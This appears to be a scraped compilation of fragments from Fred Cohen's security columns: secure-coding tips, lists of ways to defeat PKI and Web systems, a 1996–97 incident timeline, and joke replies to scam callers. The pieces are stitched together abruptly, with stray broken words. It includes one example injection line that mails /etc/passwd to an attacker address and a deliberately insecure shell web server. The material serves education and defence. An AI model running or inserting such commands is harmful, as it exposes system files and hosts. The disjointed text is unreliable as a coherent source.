Академический Документы
Профессиональный Документы
Культура Документы
Designing and implementing secure software systems can be quite complex, but a lot of
improvement can be gained by fairly straight forward methods. In this article, we will explore 20
things you can do to help make your software systems more secure.
Many software security lapses happen because of errors and omissions that could be easily
avoided with some attention and effort. These are examples of some of the most common flaws
in software that are easy to avoid if you only take the time and effort to be a little bit careful and
thoughtful.
If somebody comes along and makes SIZE smaller in the next program revision, there could be
an input overflow.
If any of these variables contain user input, they might include something like this:
`cat /etc/passwd | /bin/mail badguy@evil.com`
OK - so everybody makes mistakes. But just because you make them, doesn't mean you have to
let them remain mistakes. By responding quickly and openly, you can (1) fix the problem before
it causes much harm, (2) make your customers believe you care about them, and (3) get
widespread open praise from the security community.
Nobody is or can be perfect today when it comes to commercial software. We don't really even
know what perfect means. But just because you can't have the perfect body, that doesn't mean
you should weigh a ton, smoke like a fireplace, and eat cheese-burgers for all three meals every
day. Perfection isn't the goal, but reasonable and prudent is. So what is reasonable and
prudent? It depends on the consequences of a mistake. Here are things that any quality
software developer should include in their process.
next version. They certainly would have noticed the change in priority that brought down
several major cities for about a week if they had simply run a standard check. Look for changes,
make sure they make sense, and save yourself a lot of embarrassment and ridicule.
Lots of people complain that the customers end up testing the products these days, and I think
it's largely true. The rush to market seems to override all prudence in product quality for some
companies. But I am a firm believer in the alpha test and the beta test.
Part 5 - Just because you can't be perfect doesn't mean you shouldn't try:
Finally, here is an extract of a week's worth of news items related to software security faults
that got out into the public. Try to avoid making this list...
29 April 1999: Intel Chip's Serial Number Rears its Head Again
While Intel has distributed software which it says hides its chip's embedded serial number, ZeroKnowledge Systems, a Canadian software company, has placed a program on the web which
makes it visible again.
1. Flood the PKI with fictitious user IDs and names. The net
effect is that any typo gets the user one of your pre-positioned
keys. You then decrypt their messages and forward them
encrypted to the intended recipient.
2. Interrupt traffic every 10 or 20 packets by sending a 'reset'
packet to the session. Since PKI uses private key encryption
for high volume transmissions, it depends heavily on
synchronization for its proper operation. Every time you
desynchronize the private key system, new public key
exchanges have to be make to get a new private key - at the
overhead of lots of computer time and exchanged bits. The
system will rapidly become unusable.
3. Buy a public key under a phony name and start sending
viruses with a signature that is traceable to the fictitious
identity. Since key revocation works so poorly today, this will
liekly be trusted for a long time to come.
4. Buy a new phoney public key every few hours and send
viruses with them all.
5. Put a Trojan horse in a Word document to send out the
users' private key file. Actually, this was done earlier in 1999,
so it's not an original idea.
6. Put a virus in a Spread Sheet that sends out the users'
private key file. See #5 above.
7. Break into the user's computer by exploiting some other
weakness and forge their private key use.
8. Break into a user's system and listen to their keystrokes as
they type in the password used to reveal their private key (for
systems that protect the private key file with some other form
of cryptography).
9. Guess the password on the 'locked' private key file stolen
with one of those techniques above.
10. Use a Trojan horse to disable cryptography without telling
the user about it, so that it looks like it is encrypting when it is
not.
11. Revoke the key of a user who is still using their key. This
will cause them to have to re-register again and again and
confuse the whole system over time.
12. Get people to encrypt things you provide them, and use it
to get their private key. This was demonstrated to work in the
early 1980s.
13. Break into a server that stores public keys and change
them to ones you specify.
14. Get into the Internet's DNS system and change the
apparent location of the various key servers on the net. The
whole PKI system will break down as no servers can be found
anymore to verify anything.
15. Crash a few key servers that form the base of the PKI tree
for the users' you want to defeat and they will be unable to
communicate except in plaintext.
16. Observe the time taken to do encryption using peoples'
private keys and analyze the time differentials for different
things encrypted to derive the private key bits.
17. Use network time protocol forgeries to make some
cryptosystems get desynchronized. The overall effect for many
key servers is that they will no longer trust other servers and
refuse to communicate with them.
18. As initial key distribution is done, place an attacking
machine between the machines exchanging keys and do a
man-in-the-middle attack to make each think you are the
other. You will now be permanently in the middle of all their
communication.
19. Use a van-Eck attack to observe the 'secret' messages
before they are encrypted.
20. Use a van-Eck attack to observe the 'secret' messages
after they are decrypted.
21. Use video-viewing to observe the keyboard of the user as
they type in their keys.
22. Use video-viewing to observe the keyboard of the user as
they type in their messages.
23. Put a fake keyboard adapter between their keyboard and
computer and pick up the keys and messages as they are
typed.
24. Break into the manufacturer of the PKI system and place a
Trojan horse into their system. Nobody will ever find it.
25. Pay the companies to put in a Trojan horse.
26. Force people to use key escrow, and then break the escrow
system through legal or extralegal means.
27. Limit key length to only a few hundred bits of key. The
government exploited this one for a long time - and still does.
28. Create a false distribution of a PKI system and put it into
the infrastructure as a replacement for the original. Then
people will download the Trojan version and think they have
the real thing. The 'self-authentication' will of course claim it is
legitimate.
29. Create a clever new crypto-algorithm that has a real subtle
backdoor and get lots of people to use it. You will be able to
exploit it while everyone thinks it's secure.
30. Use a parallel processor to break keys of limited length.
This has been successful against systems of current common
key lengths.
31. Write a computer virus that implements a massively
parallel cryptoanalysis engine for breaking private keys.
Distribute via the Internet.
44. Create a false update for the cryptosystem and send it out
to users. When they load the update, it contains a Trojan
horse that defeats the system.
45. Most data exchanged via encryption is stored in plaintext.
Get access to the database where they store the information at
either end and defeat the value of the cryptosystem in
assuring the confidentiality and integrity of the underlying
data.
46. Find one of the many flaws in the cryptographic protocol
used to do key exchange and private key distribution and
exploit it to defeat the cryptosystem. Current cryptographic
protocols have been found to have many vulnerabilities.
47. Convince the user to misuse the cryptosystem - for
example - to use a weaker cryptosystem because it's faster.
48. Corrupt the browser via a Trojan horse so that it makes it
look like the cryptosystem is in use when it is not. For
example, make the lock appear to be locked in Netscape.
49. Break into the certificate server and take the master
certificate. Then you can subvert the whole system without
anyone knowing about it.
50. Publish an article on 50 ways to defeat your PKI and
cryptosystem, thus eroding public confidence in PKI and
making the system less trusted from a public perception
perspective. I think I have done that by now.
It's 4:57 - no problem - I even responded to a few unrelated emails along the way. Time to
email it off to Richard and take the kids to soccer.
CyberCops are particularly vulnerable to exploitation when they are doing investigations on
the Internet. To help them, and others who want to be safer when cruising the Internet,
Fred Cohen and CyberCop.org (Kevin Manson) provide this list of the 50 ways to protect
your information assets when cruising the Internet.
System configuration must be done properly in order to have a modicum of security. Here
are some configuration issues you should address:
Passwords have been a security issue for a long time, and most people still don't know how
to use them safely. You need to know how to create and use passwords that are properly
crafted to the need:
Don't trust remotely obtained software. It can contain Trojan Horses that are potentially
devastating in their effect. Examples of how this has been exploited in the past include but
are by no means limited to (1) causing your system to dial out to a 900 number for Internet
service, (2) stealing your online information, (3) corrupting or destroying information on
your system, (4) turning the computer into a jumping off point to attack other systems, and
(5) placing a Trojan horse in your system to permit remote reentry and exploitation at a
later date.
Keep up to date on the information security issues that might effect your system:
try to do to you and how. You might want to see how attackers
think by exploring one of the games on the all.net web site.
32. Don't forget other communications channels that may be
vulnerable, such as voicemail.
33. Ask others who are competent to review or audit your
security practices.
34. Don't forget that critical data may be far more resilient to
degradation or corruption when placed on paper than on
magnetic or optical media.
You are likely to hear all sorts of things about secure electronic commerce these days, and I
figured you might want to know what kind of assertions with limited veracity value are out
there.
The biggest class of lies is that the Web is a place that gives the consumer better
information or somehow levels the playing field between the big money and the little
money. Here are some of the examples:
Lie 1: The Web is a place where you can easily find the best
price. It used to be but it is no longer. Rather, it is a place
where people with advertising dollars can put their prices in
front of you ahead of others - just like it is in paper,
telephones, television, and every other media.
Lie 2: The big search engines reference anybody out there. Not
even close. They reference people who use products that push
Web pages out for referencing, and those who pay for the
service can usually get on the earlier pages of your searches.
Lie 3: The Web is a place where content dominates. It used to
be true, and there is certainly more content on the Web than
anywhere else, but the vast majority of commercial Web sites
today have very limited content and are predominantly
advertising vehicles. Most of what you find is not useful
content and choosing the proper search terms is not as easy
as you are told.
Lie 4: The Internet is a friendly place to voice your opinions.
Who are we trying to kid. The Internet is often very impolite,
insulting, and rude.
Lie 5: The vast majority of the information on the Internet is
truthful and accurate. Highly dubious claim. In my field, I find
that less than 20 percent of the content is accurate to the
standard I require, and as for truthfulness, false advertising
has found a whole new meaning in the Web.
Lie 6: Misinformation and reputations are easily corrected in
the Web. Nothing could be further from the truth. The Internet
is the greatest rumor mill ever created. A lie can spread like
wildfire, but try to correct it, and you will be faces with a huge
uphill battle.
Lie 7: If enough people say it, it's likely to be true. There are
people who assume multiple identities in the Internet so that
The second biggest class of lies is that some vendor is going to make you safe. Here are
some examples of this one:
Lie 11: Microsoft is going to make you safe. This is perhaps the
most bizarre statement ever concieved by humanity. Just
about every Microsoft product ranks as the most unsafe,
insecure product of its kind available on the market.
Lie 12: A virus scanner will make you safe. No virus scanner
can ever make you safe. The best it can do is to detect some
of the viruses that exist today and some of the viruses that are
yet to exist. This may make you a bit safer, but it only solves a
small subset of the overall set of issues you face.
Lie 13: Your firewall will make you safe. There is no firewall
today, nor is there likely to ever be a firewall that will keep
you safe from attack. Firewalls, like other technologies, can
help to prevent and detect some class of attacks that might
otherwise succeed, but for every now attack that firewalls deal
with, there are hundreds that firewalls fail to protect against.
Lie 14: A router will make you safe. Many people mistake the
function of a router for a firewall in terms of the security
Let's move on to the almost mystical belief that the magic of cryptography will make you
safe.
For the most part, anybody can get a certificate that claims
anything they want to claim and do so with little effort or cost.
Furthermore, certificates as they are most commonly used are
susceptible to man-in-the-middle attacks and other similar
exploits.
Lie 26: You can trust your credit cards to Internet
cryptography. The vast majority of credit card theft involving
the Internet is from servers that store and process large
numbers of credit cards. In the form most of these numbers
are kept on those servers, cryptography has nothing to do with
the process.
Lie 27: "128-bit encryption technology is the most secure form
of data scrambling commercially available." I read this one
from a commercial site - it's total baloney. Commercial
cryptography is available with unlimited key sizes, and
furthermore, key size is not a good measure of the strength or
effectiveness of cryptography. Larger keys don't always make
for safer encryption.
Lie 28: "SSL establishes a secure session by electronically
authenticating each end of an encrypted transmission. The
idea is that you know exactly whom you are communicating
with before sending any sensitive information." This is a total
fantasy - it does no such thing. SSL only sets up an exchange
of information that is kept secret by cryptographic techniques.
There is no ability in this system to prove anything about the
identity of the person or organization at the other end of the
communication.
Lie 29: The one-time-pad is not a practical cryptographic
system. Another fantasy put forth by the purveyors of cryptofiction. Not only is the one-time-pad viable, it is used in one
form or another for all applications where extremely high
assurance is desired. The one-time-pad is the only perfectly
secure cryptographic system.
Lie 30: It's just like a one-time-pad. I can't count the number
of vendors that have, at one time or another, sold a
cryptographic system as a one-time-pad when it wasn't one.
There are true one-time-pad systems, but the vast majority of
claims about systems being just like it - or in some cases -
50 Ways to Defeat
Your Intrusion Detection
System
by
Fred Cohen of Fred Cohen & Associates (fred at all.net)
Series Introduction
Over the last several years, computing has changed to an
almost purely networked environment, but the technical
aspects of information protection have not kept up. As a result,
the success of information security programs has increasingly
become a function of our ability to make prudent management
decisions about organizational activities. Managing Network
Security takes a management view of protection and seeks to
reconcile the need for security with the limitations of
technology.
Background and Introduction:
This article is based on a short piece I wrote a few weeks ago
on an airplane on the way back from the National Computer
Security Center / National Institute of Science and Technology
conference.
I was one of 12 speakers on a panel discussion about how to
protect networks when the style of computing involves loading
untrusted executable programs from over the Internet into
network browsers running on computers inside the firewall. At
some point during that panel discussion I stated that, while the
idea of intrusion detection systems was an interesting one and
one that should be followed as a possible candidate for helping
to address this challenge, current systems were so poor as to
own
protocol
for
new
Series Introduction
The Internet is now the world's most popular network and it is full
of potential vulnerabilities. In this series of articles, we explore the
vulnerabilities of the Internet and what you can do to mitigate
them.
Some Background
The World Wide Web (a.k.a. the Web, WWW, or W3) may be the
most widely used information system ever. There are claims of
about ten million regular users, and many sites now claim to
process more than 100,000 requests per day. The Web is comprised
of a highly distributed set of tens of thousands of
informationservers,
an
unknown
number
of
freely
available browsers, and the Internet which facilitates its operation.
Nobody owns the Web. Individual servers and browsers are owned
by anyone who wants to make them available or use them. There is
no central coordinating body, but there are some standards
committees that try to augment existing protocols with highly
flexible protocols to enhance function (usually at the cost of
everything else). Information in the Web comes in many forms, but
it is primarily in the form of Hyper-Text Markup Language (HTML)
documents. The way it all works is:
If this seems overly simple, it's not. We implemented a secure Getonly server in a few hours, and an insecure one can be implemented
in a minute or two. Here's an example Unix shell script that (sort of)
works (but it's VERY insecure):
read a b c
cat $b
To use it, you have to make this the listener on port 80 (via the
inetd program under Unix). It takes a few minutes - but don't do it.
It's really very risky.
To make a minimal browser, the following Unix shell script will get
the information if you provide the URL, HOST, and PORT:
(echo "get URL http";sleep 10) | telnet HOST PORT
Try "/" for the URL, "all.net" for the HOST, and "80" for the PORT as
an example.
Dirty Pictures
Aplets are the names for Java programs that can be automatically
loaded onto your computer and run at the push of a button when
you use a Java-based application. Since selections that run aplets
look like any other Browser selection, you cannot tell whether any
particular button push will run an aplet or not. Since Java is a
general purpose language, aplets can potentially do almost
anything. There are some security features in the language meant
to prevent certain types of threats, but they have not been
demonstrated to be effective in any current implementations and,
perhaps more importantly, they only address a small portion of the
threats we consider.
10) Introduce Trojan Horses*: A Java aplet may be advertised as
one thing but actually be something else. For example, an aplet that
claims to be a search engine for electronics products from the whole
Internet may only provide products distributed through one
distributor.
11) Introduce viruses: A Java aplet is capable of reproducing itself
and sending itself back out over the network. This makes networkbased viruses with Java a real possibility.
12) Send your information out: Since aplets are general purpose
and linked into standard libraries, they may fool your users into
selecting filenames which are then transmitted out of the company.
13) Redirect request through attacker*: Aplets can also be used to
redirect requests so that they go through the attacker rather than to
normal locations they appear to point to. The allows the attacker to
watch and modify all traffic in both directions as long as the user is
pressing buttons within the display area of the screen.
14) Consume bandwidth with big downloads*+: While the user is
looking at the screen, an aplet can be silently sending large
amounts of information between the server and the browser. This
can be done without interfering with the display, and can result in a
lot of bandwidth being consumed.
15) Trick the browser into routing into your network: If you can get
the user or the browser to output to a file on the browsers
computer, you could overwrite a configuration file that would route
all traffic through the attacker's computer. This would give the
attacker unlimited control over access and content.
16) Forge look and feel of internal machines and gather
information*: By making an external server appear to the an
internal server, a user could be fooled into doing internal work (such
as entering information into confidential databases) through an
external system. One of the attacks listed above was to cause HTML
information to be redirected through attacker's computer.* This
could have many implications:
17) Get usage statistics*: It would be simple to gather usage
statistics to see how much you use the Web, which sites you tend to
visit, and what you usage pattern is like.
18) See what you are investigating today*: A more detailed
investigation attacking many browsers could be used to get
intelligence on what your company is researching using the Web. A
more active attacker could modify information provided to you in
order to manipulate your actions.
19) Take credit card numbers: If you use credit card or charge
numbers through a Web server, redirected requests could give away
this information to an attacker who could exploit it for financial
advantage.
sell things for money. What they might sell is left to the readers'
imagination.
26) mom's not at home.: A burglar or kidnapper could use the Web
to find out from children about their household schedules, and
exploit this information in order to reduce their risks of being caught
at bad acts.
27) to be in pornographic films.: One of the things children might be
solicited to sell would be the use of their bodies.
Server-Side Attacks
corrupt
corrupt
The network that the Web runs on is primarily the Internet, and the
Internet has ineffective protection across the board. Although I have
now met the promise of 50 attacks, I'm throwing these ten in for
free.
51) Overload the server with unterminated inits.*+: The Web uses
TCP to transport information, but the design of TCP has a flaw.
When a session is initialized, it takes a request, a confirmation, and
a synchronization before things get going. If the attacker sends a
request, and the server responds, there is no specified timeout for
the third part of the protocol. By not sending the third message, the
server waits forever for the message to proceed. Servers have limits
on the number of processes that can be in this state at any given
time, so by doing the same thing that number of times, all further
TCP ports opens to Web services will fail until the system is
rebooted.
52) Rewrite URLs on the fly to redirect requests.*+: Once a request
comes through a server, that server can start to act like a gateway
for further requests byrewriting URLs. For example, if it has a list of
other servers and you select one, the self-declared gateway can
write the address of the requested URL as a fake address in the
gateway server. As it handles the request for you, it can rewrite
each URL in the documents you request to continue routing all
service through the gateway. Arbitrary corruption, denial, and
leakage can be implemented with this technique.
53) Record all user's Web transactions for intelligence.*: If your
computer is in the path between any other server and browser, you
can record all transactions passing through your system and use the
information to determine usage patterns indicative of strategic
planning.
54) Send files that crash readers.*+: Anyone in the network can
potentially introduce a packet into a TCP channel to cause a browser
crash in response to a request.
55) Send files that violate the law by possession.: For example, you
could send credit card numbers to be put into a server for
subsequent use.
56) Send programs that create IP tunnels through firewalls on port
80.*: If people use the Internet to load programs (for example the
real-audio program is loaded over the Internet), it is possible to
introduce a Trojan horse that creates an IP tunnel (similar to an
application gateway used in a firewall) to allow unlimited IP access
between the Internet and internal networks.
57) HTTP pointer loops that cause numerous reads and crash
connections.*+: Since HTTP files can cause automatic browser-side
loading of other HTTP files, it's possible to create an infinite loop of
files that never stop loading information.
1996.03.06 Boston ISPs hacked by U4ea; deleted Boston Globe web pages
1996.03.17 Telia, Sweden's biggest ISP, home page hacked
1996.04.05 N00gz indicted for computer fraud; accessed Bell, Sprint, SRI
1996.04.19 NYPD voice-mail system hacked
1996.04.27 Cambridge U hacked; confidential files broken into
1996.05.15 Datastream Cowboy from UK arrested for breaking into Rome Labs
1996.06.15 Two UK hackers charged with intruding into Lockheed computers
1996.06.20 14-year old arrested for using fraudulent credit card numbers
1996.06.25 hackers penetrate the public library network of a state
1996.07.05 1st known Excel virus, Laroux
1996.07.09 Ontario group gets into computers at a base in VA
1996.07.10 HS students crack a drink manufacturer's computer voice-mail system
1996.08.00
passwords
Fort
Bragg
soldier compromised
distributed
1996.09.25 Kevin Mitnick indicted for damaging computers at USC, stealing s/w
1996.10.05 Wazzu virus released
1996.10.15 disgruntled employee wipes out all computer files at Digital Technologies Group
1996.10.22 hackers crack Czech banks; steal $2 million
1996.10.23 Fort Bragg, NC paratrooper hacked U.S. Army systems and gave passwords to
China
1996.10.25 Florida Supreme Court home page hacked
1996.11.05 hackers attack anti-military site (www.insigniausa.com); erased files
1996.11.08 NY Times web site hit by SYN-flood attack; DoS
1996.11.10 Latin Summer Meeting home page hacked; porno and satire added
1996.11.12 Kriegsman furs web page hacked by animal rights activist; used phf hack
1996.11.17 hackers removed songs from computers at U2's Dublin studio
1996.11.21 Danish Research group get into computers at TX base
1996.11.22 NY city workers falsified computer records in largest tax fraud in NY
1996.11.26 Web site that provided news about Belarus leader was destroyed
1996.11.27 Nethosting and 1500 client home pages hacked
1996.11.29 Disgruntled computer technician brings down Reuters trading net in Hong Kong
1996.12.06 England's Labour Party web site hacked
1996.12.14 hackers attack WebCom, knocking out 3,000 web sites; used SYN-flood
1996.12.16 hackers crack Yale School of Medicine web page with the phf hack
1996.12.16 NASA home page hacked (Goddard); hack has both frames and JavaScript
1996.12.20 6 Danish hackers sentenced for attacking Pentagon computers
1996.12.23 Zhangyi Liu arrested in Dayton for cracking into WPAFB computers; had
passwords
1996.12.29 Air Force home page hacked at DTIC; DefenseLINK shut down
1996.12.30 NASA home page hacked again by StOrM
1997.05.23 Carlos Salgado grabs 100,000 credit card numbers from San Diego; used a
sniffer
1997.05.27 The Lost World Jurassic Park homepage hacked
1997.05.29 hacker hit LAPD
1997.06.00 Netcom voice-mail hacked by "Mr Nobody"
1997.06.03 Delaware law enforcement officers get teenager cracking NASA
1997.06.11 USDA site hacked
1997.06.16 pro-spam hacker reported
1997.06.18 hackers in CO crack RSA's 56-bit DES encryption
1997.06.20 hackers caused denial of service to Microsoft's NT IIS web server
1997.06.25 Geocities frontpage got hacked
1997.06.30 hackers cause DoS on Microsoft NT server with header packets
1997.07.11 ESPN and nba.com (starwave) shut down after hacker emails shoppers credit
info
1997.07.14 Danish computer guy finds hole in Netscape; asks for big reward money
1997.07.15 Canadian Security Intelligence Service got hacked
1997.07.18 hackers attack Swedish Crack-a-Mac site
1997.07.18 hackers attack MacInTouch - SYN flood
1997.08.01 Long Island group added a Trojan horse to hijack users' modem
1997.08.08 George Mason Univ students hacked their way into the Univ computers
1997.08.10 Cyper Promotions servers hacked
1997.08.16 Experian (TRW credit bureau) Internet allowed wrong credit reports
1997.08.18 Crack a Mac front page got hacked at hacke.infinit.se
1997.09.01 Altavista homepage got hacked (altavista.com)
1997.09.15 hackers hit coca-cola web site
1997.09.24 lince.com NT server got hakced
Unless otherwise stated, after you say the line, hang up the phone.
[continue the pitch till they pay and agree to your online
courses]
18. Hello... I can't hear you... You must have a bad line...
19. Is this Walt? Walt? Man, this isn't funny anymore. Just
come over for the game.
20. [in whispered tones] My husband's still home. We'll meet
at the usual place at 4:30 this afternoon.
21. You have no idea of how long I've been waiting for
someone to call. [engage them in an hour long conversation
about how your 2nd husband (may he rest in peace) left you
with plenty of everything but his lost love]
22. Our computers are all beyond repair since that explosion. I
thought you guys were coming tomorrow to do the cleanup?
[await response, complain, get disgruntled, then hang up in a
huff]
23. I'm sorry. That isn't in our telephone answering script and
I am not supposed to vary from the script.
24. Start humming the tune from the Godfather.
25. Just a minute while I turn off the TV. It's hard to hear over
QVC. Now what are you selling and which credit cards do you
take? [give them false credit card information]
26. Oh - you don't want me. You want the frauds department.
That's extension 2311.
27. Did you read "Frauds, Spies, and Lies"? There are far
better scams than this one over the phone.
28. No grab told keep nibble retroactive gremlin frost
beachtree ... [say a bunch of random words - as if it was a
coded response]
29. Confirmation #23441 - please provide response. [wait till a
response then state "invalid response" and hang up]
30. [just hang up]
31. [Interact indicating you have a NetTrack 1573 computer
and it's broken ...]
32. This is computer repair. How can we help you? [keep
telling them this is computer repair and acting confused]
33. I'm glad you called - I lost your FedEx number and couldn't
ship that computer last week. What was the Fed Ex number,
name, address, and phone number again? [Collect it so you
can send them the computer to repair ...]
34. Are you sure you have the right number? This is the
softlight massage parlor and all we have is a cash box.
35. Are you from router repair, switch repair, mainframe
repair, software repair, ... [ ask them more and more
questions to differentiate precisely which repair group you are
from, and then tell them ...] Ah! We don't have any of those at
this site.
36. Thanks for calling. Have you ever read Faulkner? [use
whatever you like and engage them in a conversation about
your favorite book or movie]
37. Praise the lord! [engage them in a religious conversation
and try to convert them to a religion of your choice].
38. Do you believe in God? [try to save them from fraudcallers purgatory]
39. One moment for the psychology department. [place them
on hold forever]
40. One moment... [place them on hold for a few minutes and
repeat]
41. Thank you for calling. Would you please take the following
survey on customer satisfaction? Press 1 for yes. [play like you
are an automated machine asking ever more ridiculous and
personal questions]
42. Sorry, this is the computer destruction department. You
fix-em, we break em.
43. Thank goodness they got rid of the old IT department.
They were terrible. Jan in accounting told me that ... [spend a
while going through office rumor and similar things claiming
that IT is terrible, but be sure to use fictitious names]
44. Is this IBM, Dell, or Amazon calling? [wait for an answer
before hanging up]
45. Great. What's the safety code? [give them 2 tries then tell
them that they are not who they claim to be]
46. Your maintenance password please. [act like you typed it
in and it failed and repeat till 3 tries then hang up]
47. Thank you for calling. How can I help you? [continue to be
polite and answer questions with lies, but never touch a
computer in the process and don't tell them anything real. Act
like your computer is broken and just doesn't work. No matter
what they tell you to try, just tell them the screen went black
and nothing is on it now.]
48. Are you from Comcast? You people never fix these things
right. When will you be here for your appointment. I've been
waiting for 3 hours. [continue to insist they are from Comcast
(or whatever provider you like) and get them to commit to an
exact time for an appointment - make sure you give them a
bad address]
49. Are you from AT&T? [insist they are your cell providers,
that they need to come anf fix your cell service, and they owe
you for the loss of service last month]
50. I have been trained by reading the "50 ways to respond to
Computer Repair..." article at all.net. So have my friends and
colleagues. Don't bother to call again.
Any of these or many other respoinses are just fine. As long as you don't give them any real
information.